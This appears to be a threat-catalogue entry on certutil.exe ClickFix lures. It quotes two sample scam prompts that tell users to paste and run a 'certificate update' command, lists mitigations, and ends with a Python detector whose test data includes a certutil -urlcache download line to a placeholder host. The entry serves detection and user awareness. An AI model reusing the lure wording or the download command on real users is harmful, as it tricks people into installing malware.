⚠️ Security Warning

ClickFix lures can lead to malware and computer viruses. If you see text like this online, it's likely a scam.


certutil.exe

certutil.exe is a Windows command-line program that is installed as part of Certificate Services. It's used to dump and display certification authority (CA) configuration information, configure Certificate Services, back up and restore CA components, and verify certificates. Attackers commonly abuse certutil.exe to download malicious files, decode base64-encoded payloads, and bypass application whitelisting.

Tags: windows, cli, MOTW, UAC

Your SSL certificates need to be updated for secure browsing. Follow these steps to update your certificates:

  1. Press Win-R on your keyboard

  2. Type certutil and press Enter

  3. Press Ctrl-V to paste the certificate update command

  4. Press Enter to execute

Mitigations:

  • Monitor for suspicious certutil.exe command lines, especially with -urlcache or -decode parameters

  • Implement application control to restrict certutil.exe execution patterns

  • Never run commands from untrusted sources

  • Be suspicious of requests to update certificates via command line


Contributor: Michael Haag (2025-09-09)

Your secure connection settings need to be repaired. Follow these steps to fix HTTPS connections:

  1. Press Win on your keyboard

  2. Type certutil and press Ctrl+Shift+Enter

  3. Click Yes when prompted

  4. Press Ctrl-V to paste the security configuration

  5. Press Enter to execute

Mitigations:

  • Monitor for suspicious certutil.exe command lines, especially with -urlcache or -decode parameters

  • Implement application control to restrict certutil.exe execution patterns

  • Never run commands from untrusted sources

  • Use browser settings or Windows Internet Options to manage certificates


Contributor: Michael Haag (2025-09-09)
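
The command-line monitoring mitigation listed above can be prototyped as follows. This is an added example, not code from the original page or its contributor; the function names and the sample command lines are constructed for illustration, and it assumes process-creation command lines are already being collected by your logging.

```python
import re
import shlex

# Switches the page's mitigation names for monitoring.
MONITORED_SWITCHES = {"urlcache", "decode"}

# Image name certutil or certutil.exe, bare or at the end of a path.
IMAGE_RE = re.compile(r"(?:^|[\\/])certutil(?:\.exe)?$", re.IGNORECASE)

# Constructed process-creation command lines (not real telemetry).
SAMPLE_EVENTS = [
    r"certutil.exe -urlcache -f http://example.invalid/update.cer update.cer",
    r'"C:\Windows\System32\certutil.exe" /DECODE in.b64 out.bin',
    r"certutil -verify server.cer",
    r"notepad.exe -decode.txt",
]


def suspicious_switches(command_line):
    """Return the monitored switches used in a certutil command line, else []."""
    try:
        # posix=False leaves the backslashes in Windows paths untouched.
        tokens = shlex.split(command_line, posix=False)
    except ValueError:
        tokens = command_line.split()  # unbalanced quote: plain split
    if not tokens or not IMAGE_RE.search(tokens[0].strip('"')):
        return []
    hits = []
    for token in tokens[1:]:
        token = token.strip('"')
        # certutil accepts "-" or "/" as the switch prefix, in any letter case.
        if token.startswith(("-", "/")):
            name = token[1:].lower()
            if name in MONITORED_SWITCHES and name not in hits:
                hits.append(name)
    return hits


def scan(events):
    """Return (command_line, switches) for every event worth an alert."""
    results = [(cmd, suspicious_switches(cmd)) for cmd in events]
    return [(cmd, hits) for cmd, hits in results if hits]


if __name__ == "__main__":
    for cmd, hits in scan(SAMPLE_EVENTS):
        print(f"ALERT {hits}: {cmd}")
```

Matching on the switch name after either prefix and in any letter case keeps the rule from being sidestepped by writing `/DECODE` instead of `-decode`.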